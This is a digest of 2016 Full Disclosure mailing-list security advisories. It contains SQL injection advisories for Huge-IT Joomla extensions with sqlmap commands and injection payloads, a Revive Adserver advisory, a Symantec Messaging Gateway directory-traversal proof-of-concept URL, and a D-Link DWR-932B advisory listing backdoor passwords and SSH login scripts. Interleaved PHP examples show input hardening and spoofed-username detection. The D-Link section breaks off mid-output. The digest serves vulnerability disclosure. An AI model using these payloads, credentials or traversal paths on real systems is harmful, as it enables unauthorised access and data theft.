[FD] Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla

2016-09-28 Thread Larry W. Cashdollar
Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-catalog/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com
Description: Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a variety of catalogs with a specific product category. To imagine is not difficult, to use is even easier.

Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL 
into functions via 'load_more_elements_into_catalog' located in ajax_url.php. 

Vulnerable Code in: ajax_url.php

 11 define('_JEXEC', 1);
 12 defined('_JEXEC') or die('Restircted access');
.
.
.
308 } elseif ($_POST["post"] == "load_more_elements_into_catalog") {
309 $catalog_id = $_POST["catalog_id"];
310 $old_count = $_POST["old_count"];
311 $count_into_page = $_POST["count_into_page"];
312 $show_thumbs = $_POST["show_thumbs"];
313 $show_description = $_POST["show_description"];
314 $show_linkbutton = $_POST["show_linkbutton"];
315 $parmalink = $_POST["parmalink"];
316 $level = $_POST['level'];
.
.
.
359 $query->select('*');
360 $query->from('#__huge_it_catalog_products');
361 $query->where('catalog_id =' . $catalog_id);
362 $query->order('ordering asc');
363 $db->setQuery($query, $from, $count_into_page);

CVE-2016-1000125
Exploit Code:
$ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*" --level=5 --risk=3

Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=

    Type: UNION query
    Title: Generic UNION query (random number) - 15 columns
    Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
---
[16:48:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[16:48:10] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 6637 times
[16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

[*] shutting down at 16:48:10

Advisory: http://www.vapidlabs.com/advisory.php?v=171

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla

2016-09-28 Thread Larry W. Cashdollar
Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com
Description: A video slideshow gallery.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL 
into functions located in ajax_url.php. 

Vulnerable Code in: ajax_url.php

 11 define('_JEXEC',1);
 12 defined('_JEXEC') or die('Restircted access');
.
.
.
 28 if($_POST['task']=="load_videos_content"){
 29 
 30 $page = 1;
 31 
 32 
 33 if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){
 34 $paramssld='';
 35 $db5 = JFactory::getDBO();
 36 $query5 = $db->getQuery(true);
 37 $query5->select('*');
 38 $query5->from('#__huge_it_videogallery_params');
 39 $db->setQuery($query5);
 40 $options_params = $db5->loadObjectList();
 41 foreach ($options_params as $rowpar) {
 42 $key = $rowpar->name;
 43 $value = $rowpar->value;
 44 $paramssld[$key] = $value;
 45 }
 46 $page = $_POST["page"];
 47 $num=$_POST['perpage'];
 48 $start = $page * $num - $num;
 49 $idofgallery=$_POST['galleryid'];
 50 
 51 $query = $db->getQuery(true);
 52 $query->select('*');
 53 $query->from('#__huge_it_videogallery_videos');
 54 $query->where('videogallery_id ='.$idofgallery);
 55 $query ->order('#__huge_it_videogallery_videos.ordering asc');
 56 $db->setQuery($query,$start,$num);

CVE-2016-1000123
Exploit Code:
$ sqlmap -u 'http://example.com/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" --level=5 --risk=3
.
.
.
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
---
[19:36:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[19:36:55] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2714 times
[19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'

[*] shutting down at 19:36:55
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=169

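Both Huge-IT advisories above show the same defect: a raw POST value is concatenated into `$query->where(...)`, and the paging values go unchecked into `setQuery()`. The script below is an added example, not code from either extension or from the advisories; it contrasts that construction with a hardened one in plain PHP so it runs without Joomla, and the Joomla 3 calls noted in its comments (`JInput::getInt`, `(int)` casts into `where()` and `setQuery()`) are assumptions about the Joomla API, not code from the page.

```php
<?php
// Added example (not from the Huge-IT extensions or the advisories): the
// WHERE-clause construction quoted from ajax_url.php next to a hardened
// version. Query fragments are built as plain strings so this runs under
// the PHP CLI with no Joomla installation.

/**
 * The pattern from the quoted code: 'catalog_id =' . $_POST["catalog_id"]
 * (and 'videogallery_id =' . $_POST['galleryid']). Whatever follows the
 * number is parsed by MySQL as SQL.
 */
function buildWhereVulnerable(string $idFromPost): string
{
    return 'catalog_id =' . $idFromPost;
}

/**
 * Hardened: only a positive integer is accepted; everything else is
 * rejected before it reaches the query builder. filter_var() returns
 * false for '-2369 OR 1 ...' and for '(CASE WHEN ...)' alike.
 */
function buildWhereHardened(string $idFromPost): string
{
    $id = filter_var($idFromPost, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('catalog_id must be a positive integer');
    }
    // Assumed Joomla 3 equivalent of the same guarantee:
    //   $id = JFactory::getApplication()->input->getInt('catalog_id');
    //   $query->where('catalog_id = ' . (int) $id);
    // The offset/limit from old_count and count_into_page (or perpage) are
    // cast the same way before $db->setQuery($query, (int) $from, (int) $count).
    return 'catalog_id = ' . $id;
}

// Constructed inputs shaped like the advisories' sqlmap findings.
$inputs = [
    'legitimate'  => '7',
    'error-based' => '-2369 OR 1 GROUP BY CONCAT(0x71,(SELECT 1),FLOOR(RAND(0)*2)) HAVING MIN(0)#',
    'time-based'  => '(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)',
];

foreach ($inputs as $label => $value) {
    echo "[$label]\n";
    echo "  vulnerable: WHERE " . buildWhereVulnerable($value) . "\n";
    try {
        echo "  hardened:   WHERE " . buildWhereHardened($value) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "  hardened:   request rejected (" . $e->getMessage() . ")\n";
    }
}
```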

[FD] [REVIVE-SA-2016-002] Revive Adserver - Multiple vulnerabilities

2016-09-28 Thread Matteo Beccati

Revive Adserver Security Advisory REVIVE-SA-2016-002

http://www.revive-adserver.com/security/revive-sa-2016-002

CVE-IDs: TBA
Date: 2016-09-28
Risk Level: Medium
Applications affected: Revive Adserver
Versions affected: <= 3.2.4
Versions not affected: >= 3.2.5, >= 4.0.0
Website: http://www.revive-adserver.com/




Vulnerability 1 - Reflected file download

CVE-ID: TBA
CWE-ID: CWE-79
CVSSv2: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)

CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C
CVSSv3 Base Score: 9.6
CVSSv3 Temporal Score: 8.9


Abdullah Hussam has reported via HackerOne that
www/delivery/asyncspc.php was vulnerable to the fairly new Reflected
File Download (RFD) web attack vector that enables attackers to gain
complete control over a victim's machine by virtually downloading a
file from a trusted domain.


References
==========
https://cwe.mitre.org/data/definitions/79.html
https://github.com/revive-adserver/revive-adserver/commit/69aacbd2



Vulnerability 2 - Special Element Injection

CVE-ID: TBA
CWE-ID: CWE-75
CVSSv2: 2.1 (AV:N/AC:H/Au:S/C:N/I:P/A:N)

CVSSv3 Vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:N/E:U/RL:O/RC:C
CVSSv3 Base Score: 3.1
CVSSv3 Temporal Score: 2.7


Joel Noguera has reported via HackerOne that usernames weren't properly
sanitised when creating users on a Revive Adserver instance. Especially,
control characters were not filtered, allowing apparently identical
usernames to co-exist in the system, due to the fact that such
characters are normally ignored when an HTML page is displayed in a
browser. The issue could have therefore been exploited for user
spoofing, although elevated privileges are required to create users
within Revive Adserver.

References
==========

https://cwe.mitre.org/data/definitions/75.html
https://github.com/revive-adserver/revive-adserver/commit/05b1eceb



Vulnerability 3 - Reflected XSS

CVE-ID: TBA
CWE-ID: CWE-79
CVSSv2: 4 (AV:N/AC:H/Au:N/C:P/I:P/A:N)

CVSSv3 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N/E:U/RL:O/RC:C
CVSSv3 Base Score: 4.2
CVSSv3 Temporal Score: 3.7


The HackerOne user pavanw3b has reported that the Revive Adserver web
installer scripts were vulnerable to a reflected XSS attack via the
dbHost, dbUser and possibly other parameters. It has to be noted that
the window for such attack vectors to be possible is extremely narrow
and it is very unlikely that such an attack could be actually effective.


References
==========

https://cwe.mitre.org/data/definitions/79.html
https://github.com/revive-adserver/revive-adserver/commit/14ff73f0
https://github.com/revive-adserver/revive-adserver/commit/fcf72c8a



Solution


We strongly advise people to upgrade to the most recent 4.0.0 or 3.2.5
releases of Revive Adserver, including those running OpenX Source or
older versions of the application.



Contact Information


The security contact for Revive Adserver can be reached at:
.

Please review http://www.revive-adserver.com/security/ before doing so.


-- 
Matteo Beccati
On behalf of the Revive Adserver Team
http://www.revive-adserver.com/






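Vulnerability 2 above concerns control characters surviving into stored usernames, so two distinct accounts can render identically. As an added example, not Revive Adserver code, the PHP below rejects such usernames at creation time and, for an instance that ran an affected version, groups stored usernames whose visible forms collide; the sample usernames are constructed.

```php
<?php
// Added example (not Revive Adserver code): a creation-time username check
// and an audit helper for usernames already stored.

/** Reject any username containing control (Cc) or format (Cf) characters. */
function isSafeUsername(string $username): bool
{
    // \p{Cc}: C0/C1 controls (0x00-0x1F, 0x7F-0x9F); \p{Cf}: zero-width and
    // bidi formatting characters. The /u flag makes preg_match read UTF-8.
    return preg_match('/[\p{Cc}\p{Cf}]/u', $username) === 0;
}

/** The form a browser effectively shows: the name with those characters dropped. */
function displayForm(string $username): string
{
    return preg_replace('/[\p{Cc}\p{Cf}]/u', '', $username);
}

/**
 * Group stored usernames by display form so an administrator can find
 * accounts that only differ in invisible characters. Returns only groups
 * with more than one member, keyed by the shared display form.
 */
function findSpoofedUsernames(array $usernames): array
{
    $groups = [];
    foreach ($usernames as $name) {
        $groups[displayForm($name)][] = $name;
    }
    return array_filter($groups, function (array $g): bool {
        return count($g) > 1;
    });
}

// Constructed sample: "admin" stored three times, twice with an invisible
// character inserted (a C0 control and a zero-width space).
$stored = ["admin", "ad\x01min", "adm\u{200B}in", "editor", "auditor"];

foreach ($stored as $name) {
    printf("%-16s accepted=%s\n", json_encode($name), isSafeUsername($name) ? 'yes' : 'no');
}
foreach (findSpoofedUsernames($stored) as $shown => $members) {
    echo "collision on '$shown': " . json_encode($members) . "\n";
}
```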

[FD] Symantec Messaging Gateway <= 10.6.1 Directory Traversal

2016-09-28 Thread Rio Sherri
# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix : https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does
# not properly sanitize user input submitted for charting requests.
# This could potentially result in an authorized but less privileged user
# gaining access to paths outside the authorized directory.
# This could potentially provide read access to some files/directories on the
# server for which the user is not authorized.
#
The problem lies in the package kavachart-kcServlet-5.3.2.jar, file com/ve/kavachart/servlet/ChartStream.java.
The vulnerable code is:
extends HttpServlet {
    public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
        block6 : {
            try {
                String string = httpServletRequest.getParameter("sn");
                // Taking parameter "sn" and writing it to the "string" variable

                if (string == null) break block6;
                String string2 = string.substring(string.length() - 3);

                byte[] arrby = (byte[])this.getServletContext().getAttribute(string);
                // The string variable is passed here without any sanitization
                // for directory traversal, and you can successfully use this
                // to do a directory traversal.

                if (arrby != null) {
                    httpServletResponse.setContentType("image/" + string2);
                    ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
                    httpServletResponse.setContentLength(arrby.length);
                    servletOutputStream.write(arrby);
                    this.getServletContext().removeAttribute(string);
                    break block6;
                }


POC: 
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib



[FD] Multiple vulnerabilities found in the Dlink DWR-932B (backdoor, backdoor accounts, weak WPS, RCE ...)

2016-09-28 Thread Pierre Kim
Hello,

Please find a text-only version below sent to security mailing lists.

The complete version on analysing the security in Dlink 932B LTE
routers is posted here:

https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html


=== text-version of the advisory without technical explanations ===



## Advisory Information

Title: Multiple vulnerabilities found in the Dlink DWR-932B (backdoor,
backdoor accounts, weak WPS, RCE ...)
Advisory URL: https://pierrekim.github.io/advisories/2016-dlink-0x00.txt
Blog URL: 
https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
Date published: 2016-09-28
Vendors contacted: Dlink
Release mode: Released
CVE: no current CVE
DWF: no current DWF



## Product Description

Dlink is a multinational networking equipment manufacturing corporation.



## Vulnerabilities Summary

The Dlink DWR-932B is an LTE router / access point overall badly
designed with a lot of vulnerabilities.
It's available in a number of countries to provide Internet with an LTE network.
It's a model based on the (in)famous Quanta LTE router models and
inherits some vulnerabilities.

The tests below are done using the latest available firmware (firmware
DWR-932_fw_revB_2_02_eu_en_20150709.zip,
model revision B,
/Share3/DailyBuild/QDX_DailyBuild/QDT_2031_DLINK/QDT_2031_OS/source/LINUX/apps_proc/oe-core/build/tmp-eglibc/sysroots/x86_64-linux/usr/bin/armv7a-vfp-neon-oe-linux-gnueabi/arm-oe-linux-gnueabi-gcc).

The summary of the vulnerabilities is:

  - Backdoor accounts
  - Backdoor
  - Default WPS PIN
  - Weak WPS PIN Generation - with a reverse-engineered algorithm
  - Leaking No-IP account (?)
  - Multiple vulnerabilities in the HTTP daemon (qmiweb)
  - Remote FOTA (Firmware Over The Air)
  - Bad security practices
  - Security removed in UPnP

A personal point of view: at best, the vulnerabilities are due to
incompetence; at worst, it is a deliberate act of security sabotage
from the vendor. Not all the vulnerabilities found have been disclosed
in this advisory. Only the significant ones are shown.

This router is still on sale.

Due to lack of security patches provided by the vendor, the
vulnerabilities will remain unpatched and customers with questions
should contact their local/regional D-Link support office for the
latest information.


## Details - Backdoor accounts

By default, telnetd and SSHd are running in the router.

Telnetd is running even if there is no documentation about it:

user@kali:~$ cat ./etc/init.d/start_appmgr

[...]
#Sandro { for telnetd debug...
start-stop-daemon -S -b -a /bin/logmaster
#if [ -e /config2/telnetd ]; then
start-stop-daemon -S -b -a /sbin/telnetd
#fi
#Sandro }
[...]

2 backdoor accounts exist and can be used to bypass the HTTP
authentication used to manage the router.

admin@homerouter:~$ grep admin /etc/passwd
admin:htEcF9TWn./9Q:168:168:admin:/:/bin/sh
admin@homerouter:~$

The password for admin is 'admin' and can be found in the /bin/appmgr
program using IDA:

About the root user:

user@kali:~$ cat ./etc/shadow
root:aRDiHrJ0OkehM:16270:0:9:7:::
daemon:*:16270:0:9:7:::
bin:*:16270:0:9:7:::
sys:*:16270:0:9:7:::
sync:*:16270:0:9:7:::
games:*:16270:0:9:7:::
man:*:16270:0:9:7:::
lp:*:16270:0:9:7:::
mail:*:16270:0:9:7:::
news:*:16270:0:9:7:::
uucp:*:16270:0:9:7:::
proxy:*:16270:0:9:7:::
www-data:*:16270:0:9:7:::
backup:*:16270:0:9:7:::
list:*:16270:0:9:7:::
irc:*:16270:0:9:7:::
gnats:*:16270:0:9:7:::
diag:*:16270:0:9:7:::
nobody:*:16270:0:9:7:::
messagebus:!:16270:0:9:7:::
avahi:!:16270:0:9:7:::
admin@kali:~$

Using john to crack the hashes:

user@kali:~$ john -show shadow+passwd
admin:admin:admin:/:/bin/sh
root:1234:16270:0:9:7:::

2 password hashes cracked, 0 left
user@kali:~$

Results:

 - admin has password admin
 - root has password 1234


Working exploit for admin:

user@kali:~$ cat quanta-ssh-default-password-admin
#!/usr/bin/expect -f

set timeout 3
spawn ssh admin@192.168.1.1
expect "password: $"
send "admin\r"
interact
user@kali:~$ ./quanta-ssh-default-password-admin
spawn ssh admin@192.168.1.1
admin@192.168.1.1's password:
admin@homerouter:~$ id
uid=168(admin) gid=168(admin) groups=168(admin)
admin@homerouter:~$


Alternatively, you can fetch it at
https://pierrekim.github.io/advisories/quanta-ssh-default-password-admin.

Working exploit for root:

user@kali:~$ cat quanta-ssh-default-password-root
#!/usr/bin/expect -f

set timeout 3
spawn ssh root@192.168.1.1
expect "password: $"
send "1234\r"
interact
user@kali:~$ ./quanta-ssh-default-password-root
spawn ssh root@192.168.1.1
root@192.168.1.1's pa

[FD] Edward Snowden won Glass of Reason - (Glas der Vernunft) Award 2016

2016-09-28 Thread Vulnerability Lab
Award 2016 "Glass of Reason" (Glas der Vernunft) for Edward Snowden
(10.000€) @snowden
-
Security Press Articles
http://www.mirror.co.uk/news/world-news/german-city-gives-nsa-whistleblower-8913033
http://www.bild.de/wa/ll/bild-de/unangemeldet-42925516.bild.html
http://www.stern.de/panorama/kasseler-buergerpreis-geht-an-edward-snowden-7073662.html
http://www.zdnet.de/88272377/glas-der-vernunft-kasseler-buerger-ehren-edward-snowden/
http://www.zeit.de/news/2016-09/25/auszeichnungen-kasseler-buergerpreis-geht-an-edward-snowden-25061402
http://www.focus.de/regional/kassel/auszeichnungen-kasseler-buergerpreis-geht-an-edward-snowden_id_5984583.html
https://www.heise.de/newsticker/meldung/Edward-Snowden-mit-Kasseler-Buergerpreis-ausgezeichnet-3331286.html
-
http://hessenschau.de/tv-sendung/video-21974.html
https://www.hna.de/kassel/glas-vernunft-kassel-verliehen-snowden-wurde-zugeschaltet-6782520.html
http://www.wetter.de/cms/edward-snowden-mit-kasseler-buergerpreis-das-glas-der-vernunft-ausgezeichnet-4012717.html
http://www.arcor.de/content/aktuell/regional_news/hessen/5238264,1,Auszeichnungen--Edward-Snowden-mit-Kasseler-B%C3%BCrgerpreis-ausgezeichnet,content.html
http://www.ffh.de/news-service/ffh-nachrichten/nController/News/nAction/show/nCategory/nordhessen/nId/77386/nItem/edward-snowden-bekommt-kasseler-buergerpreis.html
http://www.dw.com/de/whistleblower-edward-snowden-erh%C3%A4lt-kasseler-b%C3%BCrgerpreis/a-35886447
http://www.ad-hoc-news.de/kassel-der-whistleblower-edward-snowden-wird-heute-mit--/de/News/51270557
http://www.kassel-live.de/?s=edward+snowden&submit=Suche
-
Note: The video recordings will be published transparently by an
uncensored German source within the next days! Feel free to share and
enjoy the unique statement.


